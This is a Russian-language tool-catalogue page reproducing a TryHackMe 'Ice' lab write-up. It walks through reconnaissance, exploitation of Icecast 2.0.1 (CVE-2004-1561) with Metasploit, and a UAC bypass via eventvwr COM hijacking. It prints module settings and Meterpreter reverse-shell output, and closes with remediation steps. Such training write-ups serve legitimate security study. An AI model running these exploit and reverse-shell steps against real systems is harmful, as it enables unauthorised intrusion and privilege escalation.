Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
thm-ice-icecast-rce-privesc — Полная компрометация машины Ice от TryHackMe — Icecast 2.0.1 RCE (CVE-2004-1561) через переполнение буфера, за которым следует повышение привилегий в Windows через обход UAC / перехват COM. Включает детальную методологию и исправление. | Kitploit
Инструменты/GitHubGitHub/monseigneurpatas/thm-ice-icecast-rce-privesc
Повышение привилегийРазведкаАнализ уязвимостейЭксплуатацияCTFТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
monseigneurpatas/thm-ice-icecast-rce-privesc

thm-ice-icecast-rce-privesc

Полная компрометация машины Ice от TryHackMe — Icecast 2.0.1 RCE (CVE-2004-1561) через переполнение буфера, за которым следует повышение привилегий в Windows через обход UAC / перехват COM. Включает детальную методологию и исправление.

Репозиторий
22 месяцев назадЕщё не проверено

TryHackMe — Ice: Icecast 2.0.1 RCE и повышение привилегий в Windows

Платформа: TryHackMe Целевая ОС: Windows 7 / Windows Server 2008 R2 Сложность: Легкая Категория: Переполнение буфера (RCE), локальное повышение привилегий


Краткое изложение

Этот отчет документирует полную компрометацию машины Ice на TryHackMe, от начальной разведки до повышения привилегий до уровня SYSTEM. Цель представляет устаревший стриминговый медиа-сервер Icecast 2.0.1, уязвимый для удаленного переполнения буфера (CVE-2004-1561), которое позволяет выполнить произвольный код через специально сформированные HTTP-заголовки. Начальный доступ был получен как пользователь с низкими привилегиями через обратную оболочку Meterpreter. Затем было достигнуто повышение привилегий до NT AUTHORITY\SYSTEM путем эксплуатации уязвимости перехвата COM-объекта Windows (bypassuac_eventvwr), которая использует автоматически повышающие привилегии бинарники и перенаправление ключей реестра в HKCU.

ЭтапТехникаРезультат
Разведкаarp-scan, nmapОбнаружен хост и 7 открытых портов
Начальный доступПереполнение буфера HTTP-заголовка Icecast (CVE-2004-1561)Сессия Meterpreter как локальный пользователь
Повышение привилегийbypassuac_eventvwr (перехват COM/реестра)Оболочка SYSTEM

1. Разведка

1.1 Обнаружение хоста

ARP-сканирование использовалось для определения IP-адреса цели в локальной сети.

root@kitploit:~
arp-scan -l

ARP scan and Nmap results

Цель определена как 192.168.37.138.

1.2 Сканирование портов и сервисов

Полное SYN-сканирование с определением сервисов и версий было выполнено против цели:

root@kitploit:~
nmap -sS -sV 192.168.37.138

Результаты:

Хост идентифицирован как DARK-PC, Windows-машина. Порт 8000 с запущенным Icecast выделялся как наиболее перспективная поверхность атаки — это не стандартный сервис Windows, и он известен историческими CVE.


2. Идентификация уязвимости

Поиск известных уязвимостей Icecast выявил CVE-2004-1561:

Переполнение буфера в Icecast 2.0.1 и более ранних версиях позволяет удаленным злоумышленникам выполнять произвольный код с помощью HTTP-запроса с большим количеством заголовков.

Был подтвержден соответствующий модуль Metasploit:

root@kitploit:~
search CVE-2004-1561

CVE search in Metasploit

root@kitploit:~
exploit/windows/http/icecast_header   2004-09-28   great   No   Icecast Header Overwrite

3. Эксплуатация — Начальный доступ

3.1 Коренная причина

Icecast 2.0.1 не выполняет должную проверку границ для количества обрабатываемых HTTP-заголовков. Отправляя больше заголовков, чем может вместить буфер сервера, избыточные данные переполняют соседнюю память, перезаписывая данные за пределами зарезервированного буфера для разбора заголовков.

В частности, переполнение повреждает сохраненный обратный адрес (EIP) в стеке — адрес, на который ЦП возвращается после завершения функции, обрабатывающей запрос. Контролируя этот адрес, атакующий может перенаправить выполнение на предоставленный атакующим шелл-код вместо легитимной точки возврата, что приводит к выполнению произвольного кода в контексте процесса Icecast.

3.2 Конфигурация модуля

root@kitploit:~
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

Exploit options and successful run

3.3 Выполнение

root@kitploit:~
exploit
root@kitploit:~
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)

Была установлена сессия Meterpreter как пользователь с низкими привилегиями.


4. Повышение привилегий

4.1 Локальный подборщик эксплойтов

С активной сессией был использован встроенный suggester Metasploit для определения возможных путей локального повышения привилегий с учетом уровня патчей цели:

root@kitploit:~
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Local exploit suggester results

Несколько модулей были отмечены как вероятно применимые, включая bypassuac_eventvwr, который нацелен на необновленные Windows 7 / Server 2008 R2.

4.2 Коренная причина — обход UAC через перехват COM

Этот путь повышения привилегий злоупотребляет архитектурой COM (Component Object Model) Windows, которая позволяет компонентам, написанным на разных языках, взаимодействовать. COM-объекты обычно полагаются на общие DLL, и система определяет, какую DLL загружать для данного COM-объекта, через пути в реестре — включая пути, хранящиеся в ветке текущего пользователя HKCU.

eventvwr.exe — это автоматически повышающий привилегии бинарник Windows (он молча инициирует запрос повышения UAC, не показывая самого окна, благодаря своим настройкам манифеста при стандартных конфигурациях UAC). При запуске он запрашивает HKCU для разрешения COM-объекта и загрузки его связанной DLL.

Эксплойт перехватывает этот поиск: он записывает вредоносный ключ реестра в ветку HKCU текущего пользователя, указывая разрешение COM на нагрузку, контролируемую атакующим, вместо легитимной системной DLL. Поскольку eventvwr.exe автоматически повышает привилегии, нагрузка, которую он запускает — в данном случае командная оболочка, — выполняется с уровнем целостности, до которого повышается eventvwr.exe, повышая сессию от обычного пользователя до контекста с более высокими привилегиями, без отображения видимого запроса UAC.

4.3 Выполнение

root@kitploit:~
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

Privilege escalation exploit success

root@kitploit:~
[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...

C:\Windows\system32>

Была открыта вторая сессия Meterpreter с повышенной оболочкой, напрямую помещенная в C:\Windows\system32, что подтверждает повышение привилегий.


5. Сводка результатов

#УязвимостьСерьезность

6. Меры по устранению

  1. Обновите или замените Icecast. Версия 2.0.1 устарела более чем на два десятилетия; обновитесь до последней поддерживаемой версии или отключите сервис, если он не используется.
  2. Ограничьте доступность стриминговых/медиа-сервисов только внутренними сетями — они не должны быть доступны из интернета или всей локальной сети без явной бизнес-необходимости.
  3. Установите актуальные обновления Windows. Злоупотребление автоповышением eventvwr.exe было исправлено в более поздних сборках Windows; эта атака не работает против полностью обновленных современных версий Windows.
  4. Ужесточите настройки UAC до уровня "Всегда уведомлять" вместо уровня по умолчанию, что закрывает несколько путей злоупотребления автоматическим повышением без уведомления.
  5. Принцип наименьших привилегий: скомпрометированная учетная запись не должна была быть частью локальной группы Администраторов, что и позволило технике обхода UAC изначально сработать.

Использованные инструменты

  • arp-scan, nmap — разведка
  • Metasploit Framework (msfconsole) — эксплуатация и пост-эксплуатация
  • Meterpreter — пост-эксплуатационная оболочка

Продемонстрированные навыки

  • Сетевая разведка и перечисление сервисов
  • Исследование CVE и сопоставление эксплойтов с уязвимостями
  • Концепции эксплуатации повреждения памяти / переполнения буфера (перезапись EIP)
  • Внутренности Windows: разрешение COM-объектов, перехват реестра, механика обхода UAC
  • Документирование полной цепочки атаки (разведка → эксплуатация → повышение привилегий → устранение)
Скачать инструмент
ПортСервисВерсия
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows 7–10 (рабочая группа: WORKGROUP)
5357/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcphttpСтриминговый медиа-сервер Icecast
49152–49157/tcpmsrpcMicrosoft Windows RPC
CVE / Ссылка
1Переполнение буфера HTTP-заголовка Icecast 2.0.1, приводящее к удаленному выполнению кодаКритическийCVE-2004-1561
2Обход UAC через перехват COM/реестра (автоповышение eventvwr.exe)ВысокийИзвестная слабость конструкции UAC Windows 7/Server 2008 R2